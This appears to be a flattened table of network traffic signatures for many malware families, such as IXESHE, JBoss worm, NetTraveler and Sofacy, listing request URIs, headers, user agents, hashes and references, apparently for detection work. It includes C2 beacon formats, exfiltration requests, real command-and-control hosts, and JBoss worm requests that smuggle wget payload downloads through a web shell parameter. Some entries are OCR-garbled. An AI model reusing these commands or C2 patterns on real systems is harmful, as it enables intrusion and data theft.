<HOSTNAME> Connected!" "Mozilla/4.0 Mozilla/4.0(compatible;MSIE8.0; WindowsNT5.1;SV1) Mozilla/5.0
Mozilla/4.0" 57e79f7df13c0cb01910d0c688fcd296 http://intelreport.mandiant.com/
Gtalk GET /facebook.png /facebook.png "Accept: /
Pragma: no-cache
Cache-Control: max-age=0
Cache-Control: no-cache
Connection: Keep-Alive
Computer: <HOSTNAME>
User-Agent: Mozilla/4.0
Host: flash.aunewsonline.com
Content-Length: <ContentLength>

<HOSTNAME> Connected!" [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
HOIC DDoS GET / HTTP/1.0 "Accept: /
Accept-Language: en
Host: www.hoic_target_site.com" http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html
Imaut GET /setting.doc /setting.doc "Host: www.yahoo.com
Cache-Control: no-cache" 823e9bab188ad8cb30c14adc7e67066d
IRCbot GET /check_ver.php?version=1.09 /check_ver.php "/check_ver.php?version=1.09
User-Agent: -
Host: rc.rizalof.com
Cache-Control: no-cache

HTTP/1.0 200 (OK)" - 6716a417f82ccedf0f860b735ac0187 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
IXESHE GET "/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/
wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A" /AWS "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: dot.faawan.com:443
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) 443 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
IXESHE AES GET "/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=
+LLQhpkZ9LOhGbgqvJghHci7M" /AES "/AES210001 129016878.jsp?UrFwUIO3h7ofgwQInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=
+LLQhpkZ9LOhGbgqvJghHci7M
User-Agent: Mozilla/4.O (compatible; MSIE 5.01; Windows NT 5.0)
Host: 140.119.44.181
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
JBOSS worm GET /zecmd/zecmd.jsp?comment=perl+lindb.pl /zecmd.jsp?comment= http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/
JBOSS worm GET "
/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz
" idssvc.jsp?comment=
JBOSS worm GET /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz idssvc.jsp?comment=
Letsgo / TabMsgSQL GET "/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc
ode%20=%20'IXLCGIXELZ'" /indexbak.asp?rands= "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: <hostname>
Connection: Keep-Alive" Mozilla/4.0 (compatible; ) 052ec04866e4a67f31845d656531830d http://intelreport.mandiant.com/
Letsgo / TabMsgSQL GET "/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20
from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc" /1.asp?rands= "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN" Mozilla/4.0 (compatible; ) 052ec04866e4a67f31845d656531830d http://www.matasano.com/research/PEST-CONTROL.pdf
Letsgo / TabMsgSQL GET "/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20
(mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20
('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',
'2011-06-08%2013:45:54','NMQVPTXFBH')" /1.asp?rands= "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN" Mozilla/4.0 (compatible; ) 052ec04866e4a67f31845d656531830d http://www.matasano.com/research/PEST-CONTROL.pdf
Letsgo / TabMsgSQL downloader GET /new/iistart.html /iistart.html "Accept: /
User-Agent: lt-764-238+Windows+NT+5.171
Host: 122.147.13.8" lt-764-238+Windows+NT+5.171 2b1c03b4e34a123e5317182e6159e38a http://www.cyberengineeringservices.com/trojan-letsgo-analysis/
Likseput GET /index.html /index.html "User-Agent: 5.1 10:59 DELLXT\Laura
Host: nasa.usnewssite.com
Cache-Control: no-cache" 5.1 10:59 <PC-Name>\<Username> E019E37F19040059AB5662563F06B609 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Lingbo (?) POST "/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM
>QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb" /search% "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322)
Host: globalizationinteriorgov.net
Content-Length: 14277
Connection: Keep-Alive
Cache-Control: no-cache
2.r.)... ‘.5.. ,—. .i.-..dq...R.’3.w....>N.B.—z. .e90)rw.b-b9QGhT. .. .3. .n.>j.hLe" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322) 20DD4DD02C2B17A40B26843AA0C660F6 http://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html
Luckycat - WIMMIE POST /count/count.php?m=c&n=[HOSTNAME]_ /count.php?m=c&n= "Accept: /
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: [HOSTNAME]
Content-Length: 0
Connection: Keep-Alive
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf
Medfos GET /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww== /id= "Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Cache-Control: no-cache" Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 0512E73000BCCCE5AFD2E9329972208A http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
MiniASP GET /device_<decoded ID string>asp?device_t=<random 10 digits>&key=<random 8 lowercaseletters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters> /device_ "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml,
image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: <decoded_server>" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) e476e4a24f8b4ff4c8a0b260aa35fc9f http://intelreport.mandiant.com/
MiniASP GET /record.asp?device_t=<random 10 digits> &key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>&result=<URLencoded result data> /record.asp?device_t= "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml,image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-
excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-gb
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: <decoded_server>" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) e476e4a24f8b4ff4c8a0b260aa35fc9f http://intelreport.mandiant.com/
Miniduke POST /index.php /index.php "Content-Type: multipart/form-data; boundary=----------------------- 2856073314169
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; .NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2)
Host: bolsilloner.es
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
----------------------------2856073314169
Content-Disposition: form-data; name=”fname”
ibarext32. blb
----------------------------2856073314169
Content-Disposition: form-data; nanie”i”
b3cdbdo92e2ce
----------------------------I 2856073314169
Content-Disposition: form-data; name=’c’
2
" Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; . NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2) http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/its-a-kind-of-magic-1.html http://www.securelist.com/en/blog/208194129/The_MiniDuke_Mystery_PDF_0_day_Government_Spy_Assembler_0x29A_Micro_Backdoor
Mirage POST /resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow /resuIt?hl=en "Accept: / ..Accept-Laguage: en-us..
Uiser-Agent: Mozilla /4.0 (compatibIe; MSIE 6.0; Windows NT 5.1)
Connection: close
Content-Length: 293
Content-Type: appIcaton/x-www-form-urlencoded
Ericodng: gzdp, deflate.Pragma: no-cache
Host: (C&C):443
Mtdkj..21:DFkJL$KO #S%&t+,’r.ABCD_abcde(ghijklmnopqrstuvwxyz( I 9142@alv" Mozilla/4.0 (compatibIe; MSIE 6.0; Windows NT 5.1) 443 http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/
Mirage - later var GET /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg /search?hl=en&q= ASH-1.3: 1 Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/
Money loader GET "<p>/get_xml?file_id=25227372
<p>/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536" /get_xml?file_id= "Accept: /
User-Agent: tiny-dl/nix
Host: takeinfo.ru""
============
/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536
User-Agent: tiny-dl
Host: binupdate.mail.ru
Cache-Control: no-cache""" "tiny-dl/nix 
tiny-dl" 4e801b46068b31b82dac65885a58ed9e http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Mongal GET /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000 "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 61.178.77.169:84
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) C6F01A6AD70DA7A554D48BDBF7C7E065 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Murcy GET /150828 /150828 "Connection: Keep-Alive
Accept: /
Host: path.alyac.org
User-Agent: Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1)
Extra-Data-Bind: DE6A34D80D43B930
Extra-Data-Space: 65536
Extra-Data:
4ZFNSAAEAAh2AoNAAAAAAgRCHACwoSogAjKhCCf/HA
AVNAAAAeAAAgDBAAABIAAAs0kAAUAAAAQAAAAAooAA
AIAAAAATAAAAKCAAAgKAAAgqAAAA4CAAAgNAAAAOAM
DA3AgQAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxAEEAzAQOAADA5AAMAkDAwAgNAkDAxAAAAMFAlB
gcAYHApBwYAUGAgAAUAEGAjBwaAACAzAAAAAAATBQW
AMFAUBQRA0EAAAwVA8EAXBQLAUEA4AQRAxxxxxxxxx
xxxxxxxxxx2AAAAAAA
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1)" http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
Netravler GET /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT /nettraveler.asp?action=getcmd&hostid= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept-Language: en-us
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 1f26e5f9b44c28b37b6cd13283838366 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Netravler GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX <very long string> UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt /nettraveler.asp?hostid= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 1f26e5f9b44c28b37b6cd13283838366 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Netravler GET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end /nettraveler.asp?hostid= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.vipyandex.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCSBQCTCA=EFKILJMDFNHODIDELKHIFDMH

HTTP/1.1 200 OK
Connection: close
Date: Sun, 07 Oct 2012 03:37:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 10
Content-Type: text/html
Cache-control: private

Success:88" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) DA5832657877514306EDD211DEF61AFE http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
NfLog GET /IElog/TestURL.asp HTTP/1.0 /IElog/ "/IElog/TestURL.asp HTTP/1.0
User-Agent: www
Host: www.aviraco.com
Content-Length: 10
Pragma: no-cache

1234567890" www D4859FC951652B3C9657F8621D4DB625 http://contagiodump.blogspot.com/2012/02/feb-9-cve-2011-1980-msoffice-dll.html
NfLog POST /NfLog/Nfile.asp /NfLog/ "/NfLog/Nfile.asp
Accept: /
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.mlitjcab.com
Content-Length: 0
Cache-Control: no-cache" Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) 0612B3138179852A416379B3E85742EA http://contagiodump.blogspot.com/2012/08/cve-2012-0158-generated-8861-password.html
NTESSESS GET /6K8gL8.html /6K8gL8.html "/6K8gL8.html
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Cache-Control: no-cache
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 69.39.133.114
Connection: Keep-Alive
Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 692cb0fca66738055396e1e1c8f0d52c http://www.cyberengineeringservices.com/malware-obfuscated-within-png-files-sample-2-2/
PNG trojan GET /index.htm /index.htm "/index.htm
User-Agent: Windows+NT+5.1
Host: www.muckleshoot.nsn.us
Cache-Control: no-cache
The content of index.htm is parsed for the HTML comment tag:
<!--...-->" Windows+NT+5.1 1efc0c20b0445bc081890f16f59e672b http://www.cyberengineeringservices.com/the-png-trojan-%E2%80%93-acrord32-exe/
Poison Ivy GET "256 bytes of seemingly random data after a successful 
TCP handshake, then 48 byte “keep-alive” requests" http://contagiodump.blogspot.com/2012/04/poisonivy-traffic.html http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
RedOctober AuthInfo POST http://%s:%s%s "Host: %s:%s
Pragma: no-cache
Cache-Control: no-cache
Content-length: %u
Content-Type: application/x-www-form-urlencoded
POSTDATA" "793c82efc65a43ed249a45ec7c69a388 
428de53f1a1eaa040847b6456b7e5369" http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack
RedOctober Sysinfo POST /cgi-bin/nt/sk /cgi-bin/nt/sk "Host: %CnC%
Connection: close
Content-Length: %d\r\n\r\n
DATA" "e36b94cd608e3dfdf82b4e64d1e40681
a2fe73d01fd766584a0c54c971a0448a" http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack
RegSubDat POST /5501000000/log /5501000000/log "Accept: /
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Host: ibm.asia-online.us:80
Content-Length: 90
Proxy-Connection: Keep-Alive" Mozilla/4.0 c5860171f919761db9ee78ef3dac5ab4 http://www.cyberengineeringservices.com/india-united-states-naval-cooperation-doc-analysis/
Sanny / Win32.Daws POST /write.php /write.php "Host: board.nboard.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: EUC-KR,utf-8;q=0.7,;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://board.nboard.net/form.php?db=kbaksan_1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5248

[snip]
db=kbaksan_1&ch=19&name=zz.|zzz&email=&pw=1917qaz&ulink=&title=DELLXT_(0_0)&e5=0&e6=&e7=&html=2&text=fndpoGJ- 
nGkfaKu7KKsxvv&tlink=HTTP/1.1 302 Found" Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 b00ae5492ce724fd01b926a7f7cb3e66 http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html
Seasalt GET /postinfo.html /postinfo.html "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM
Host: ubuntuguru.strangled.net
Connection: Close" Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM f0726aadcf5d66daf528f79ba8507113 http://intelreport.mandiant.com/
Sofacy POST /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 /cgi-bin/brvc.cgi? "/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01
User-Agent: MSIE 8.0
Host: 200.106.145.122
Content-Length: 6
Cache-Control: no-cache" MSIE 8.0 a2a188cbf74c1be52681f998f8e9b6b5 1DA0C961C7AF849071AB86CAAF846B2A http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Sofacy POST /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS /cgi-bin/qfa.cgi? "/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
Referer: /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
User-Agent: MSIE 8.0
Host: 200.106.145.122
Cache-Control: no-cache" MSIE 8.0 1DA0C961C7AF849071AB86CAAF846B2A
Srizbi GET /cb_4.exe /cb_4.exe "/cb_4.exe 
Accept: / Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 
Host: spacestorminc.com Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 06E589B4E3AB93C6B16389DD79549A7A http://www.fireeye.com/blog/technical/botnet-activities-research/2008/08/srizbi-alongwit.html
Stabuniq POST /rssnews.php /rssnews.php "/rssnews.php
Content-Type: application/x-www-form-urlencoded
Host: benhomelandefit.com
Content-Length: 1093
Cache-Control: no-cache
id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=dWtnYWNocihjfmMmKyY5DHFrb3Z0cHVjKGN+YyYrJjkMcnRnaHVqZ3JpdChjfmMmKyY5DGVrYihjfmMmKyY5DGpnaGF2Z2VtKGN+YyYrJjkMSmdoYVN2YmdyY3QoY35jJismOQxla2IoY35jJismOQxla2IoY35jJismOQxSVkdzcmlFaWhoY2VyKGN+YyYrJjkMcXVlaHJgfyhjfmMmKyY5DGdqYShjfmMmKyY5DFJWR3NyaUVpaGhVcGUoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHFiYGthdChjfmMmKyY5DGtiayhjfmMmKyY5DGx3dShjfmMmKyY5DGNtdGgoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMR2V0f2pvZVVjdHBvZWMoY35jJismOQxlcmBraWgoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHRzaGJqajU0KGN+YyYrJjkMdXZpaWp1cChjfmMmKyY5DGN+dmppdGN0KGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQxwa2dlcm5qdihjfmMmKyY5DGp1Z3V1KGN+YyYrJjkMdWN0cG9lY3UoY35jJismOQxxb2hqaWFpaChjfmMmKyY5DGV1dHV1KGN+YyYrJjkMdWt1dShjfmMmKyY5DFV/dXJjayYrJjkMXVV/dXJjayZWdGllY3V1WyYrJjkM&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1" F31B797831B36A4877AA0FD173A7A4A2 http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html
Sykipot / Wyksol GET /kys_allowget.asp?namegetkys.kys /namegetkys.kys "/kys_allowget.asp?namegetkys.kys
Accept: /
User-Agent: HTTP-GET
Host: www. top10member . corn
Cache-Control: no-cache" "http://www.sans.org/reading_room/whitepapers/malicious/detaile
http://blog.trendmicro.com/the-sykipot-campaign/
"
Taidoor GET /apzsr.php?id=021793111D309GE67E /apzsr.php?id= "/apzsr.php?id=021793111D309GE67E
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 211.234.117.141:443
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 443 http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html
Tarsip Eclipse GET /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 /redir?di= "/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0
UA-CPU: x86
Accept:
text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1
Accept-Language: en-us
Accept-Encoding: gzip;q=0.8, deflate;q=0.5
Cookie: CLIP=<encoded host information>
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: <C2 server address>
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 123505024F9E5FF74CB6AA67D7FCC392 http://intelreport.mandiant.com/
Tarsip Moon GET /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 /2055?meth=gc&tid= "UA-CPU: x86
Accept:
text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1
Accept-Language: en-us
Accept-Encoding: gzip;q=0.8, deflate;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: <hostname>" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) 95f25d3afc5370f5d9fd8e65c17d3599 http://intelreport.mandiant.com/
Tbot tor n "...........P.......+.l.....U..w_..?z5.U.!....:.
...9.8.....5.........3.2............./.........
.....
.....Y.........www.fjpv.com.........
.4.2...................
.....
.........................#." FC7C3E087789824F34A9309DA2388CE5 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Tinba aka Zusy POST /h/index.php /index.php "Host: dakotavolandos.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: identity
Connection: close
Content-Type: application/octet-stream
Content-Length: 13

y0J.......ii.HTTP/1.1 200 OK
-- see the link" Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 c141be7ef8a49c2e8bda5e4a856386ac http://contagiodump.blogspot.com/2012/06/amazon.html
Vinself POST /w880/T19R17Q16/12010L11014 "Accept: image/gif, image/x—xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /
Accept—Language: zh—zh
Content-Type: application/octet—stream
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1)
Host: ftp.[remived].com
Content-Length: 90
connection: Keep-Al ive

Cache-control: no-—cache'

GIF89aP. . .m.w. u. p. a.3.3.i.i6U:X0Q<" Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1) http://www.fireeye.com/blog/technical/malware-research/2010/11/winself-a-new-backdoor-in-town.html
Vobfus GET /XEuPCLrf?e /XEuPCLrf?e "/XEuPCLrf?e
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
Host: 82747.ddnsd.at

" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) s70F0B7BD55B91DE26F9ED6F1EF86B456 http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html
WEBC2-Bolid GET /firefox.html /firefox.html "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: <hostname>
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 5ff3269faca4a67d1a4c537154aaad4b http://intelreport.mandiant.com/
